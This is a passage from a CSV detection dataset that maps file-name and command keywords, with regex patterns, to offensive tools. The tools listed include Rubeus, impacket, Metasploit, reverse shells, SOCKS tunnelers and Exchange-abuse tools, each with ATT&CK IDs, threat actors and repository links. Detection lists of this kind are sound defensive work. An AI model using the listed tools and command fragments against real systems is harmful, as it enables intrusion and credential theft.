Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10535" "*/RPC-Backdoor.git*",".{0,1000}\/RPC\-Backdoor\.git.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","1","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","10536" "*/RPC-Backdoor_v1.0.7z*",".{0,1000}\/RPC\-Backdoor_v1\.0\.7z.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","1","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","10537" "*/RPC-Backdoor_v1.0.zip*",".{0,1000}\/RPC\-Backdoor_v1\.0\.zip.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","1","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","10538" "*/rpcbomb.rb*",".{0,1000}\/rpcbomb\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10539" "*/rpcdump.py*",".{0,1000}\/rpcdump\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","10542" "*/rpcdump.py*",".{0,1000}\/rpcdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10543" "*/rpcdump.py*",".{0,1000}\/rpcdump\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","10544" "*/rpc-grind.nse*",".{0,1000}\/rpc\-grind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10546" "*/rpcinfo.nse*",".{0,1000}\/rpcinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10547" "*/rpcmap.py*",".{0,1000}\/rpcmap\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10548" "*/rpcrt.py *",".{0,1000}\/rpcrt\.py\s.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/yuanLink/CVE-2022-26809","1","0","#linux","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z","10551" "*/rpivot.git*",".{0,1000}\/rpivot\.git.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - 
T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","10552" "*/rsa-vuln-roca.nse*",".{0,1000}\/rsa\-vuln\-roca\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10553" "*/rservices_from_users.txt*",".{0,1000}\/rservices_from_users\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10555" "*/rsockstun *",".{0,1000}\/rsockstun\s.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","COZY BEAR","C2","https://github.com/llkat/rsockstun","1","0","#linux","N/A","10","10","53","22","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z","10562" "*/rsockstun.git*",".{0,1000}\/rsockstun\.git.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","COZY BEAR","C2","https://github.com/llkat/rsockstun","1","1","N/A","N/A","10","10","53","22","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z","10563" "*/rsocx-*-linux-x86-64.zip*",".{0,1000}\/rsocx\-.{0,1000}\-linux\-x86\-64\.zip.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","1","#linux","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","10564" "*/rsocx-*-windows-x86-64.zip*",".{0,1000}\/rsocx\-.{0,1000}\-windows\-x86\-64\.zip.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - 
TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","1","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","10565" "*/rsocx.exe*",".{0,1000}\/rsocx\.exe.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","1","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","10566" "*/rsocx.git",".{0,1000}\/rsocx\.git","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","1","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","10567" "*/rsocx/releases/download/*",".{0,1000}\/rsocx\/releases\/download\/.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","1","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","10568" "*/rs-shell.exe*",".{0,1000}\/rs\-shell\.exe.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","1","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","10569" "*/rs-shell.git*",".{0,1000}\/rs\-shell\.git.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - 
TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","1","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","10570" "*/rs-shell/zipball/*",".{0,1000}\/rs\-shell\/zipball\/.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","1","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","10571" "*/rs-shell-linux *",".{0,1000}\/rs\-shell\-linux\s.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#linux","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","10572" "*/rs-shell-windows.exe*",".{0,1000}\/rs\-shell\-windows\.exe.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","1","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","10573" "*/rsync-brute.nse*",".{0,1000}\/rsync\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10574" "*/rsync-list-files.py*",".{0,1000}\/rsync\-list\-files\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","10575" "*/rsync-list-modules.nse*",".{0,1000}\/rsync\-list\-modules\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10576" "*/rt_hijacking.exe*",".{0,1000}\/rt_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","10577" 
"*/rtsp-methods.nse*",".{0,1000}\/rtsp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10578" "*/rtsp-url-brute.nse*",".{0,1000}\/rtsp\-url\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10579" "*/Rubeus*",".{0,1000}\/Rubeus.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","10590" "*/Rubeus.dll*",".{0,1000}\/Rubeus\.dll.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","1","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","10591" "*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","#linux","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","10592" "*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","10593" "*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - 
T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10594" "*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Rubeus","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10595" "*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","Rubeus","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Rubeus","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10596" "*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10597" "*/Rubeus.git*",".{0,1000}\/Rubeus\.git.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","10598" "*/Rubeus.ps1*",".{0,1000}\/Rubeus\.ps1.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","1","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","10599" 
"*/Rubeus/*",".{0,1000}\/Rubeus\/.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","10600" "*/Rubeus-Rundll32.git*",".{0,1000}\/Rubeus\-Rundll32\.git.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","1","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","10601" "*/Rubeus-Rundll32/*",".{0,1000}\/Rubeus\-Rundll32\/.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","1","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","10602" "*/Rudrastra.git*",".{0,1000}\/Rudrastra\.git.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access 
point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","N/A","8","1","67","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z","10603" "*/ruler --domain *",".{0,1000}\/ruler\s\-\-domain\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","10604" "*/ruler --email *",".{0,1000}\/ruler\s\-\-email\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","10605" "*/ruler -k -d * dump -o *",".{0,1000}\/ruler\s\-k\s\-d\s.{0,1000}\sdump\s\-o\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#linux","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","10606" "*/ruler --url*",".{0,1000}\/ruler\s\-\-url.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","10607" "*/rulerforms.go*",".{0,1000}\/rulerforms\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - 
TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","10608" "*/run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I*",".{0,1000}\/run\s\/tn\s\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup\s\/I.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#scheduledtask","command","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","10609" "*/run/leet.pl*",".{0,1000}\/run\/leet\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","10610" "*/run/tor/socks*",".{0,1000}\/run\/tor\/socks.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - 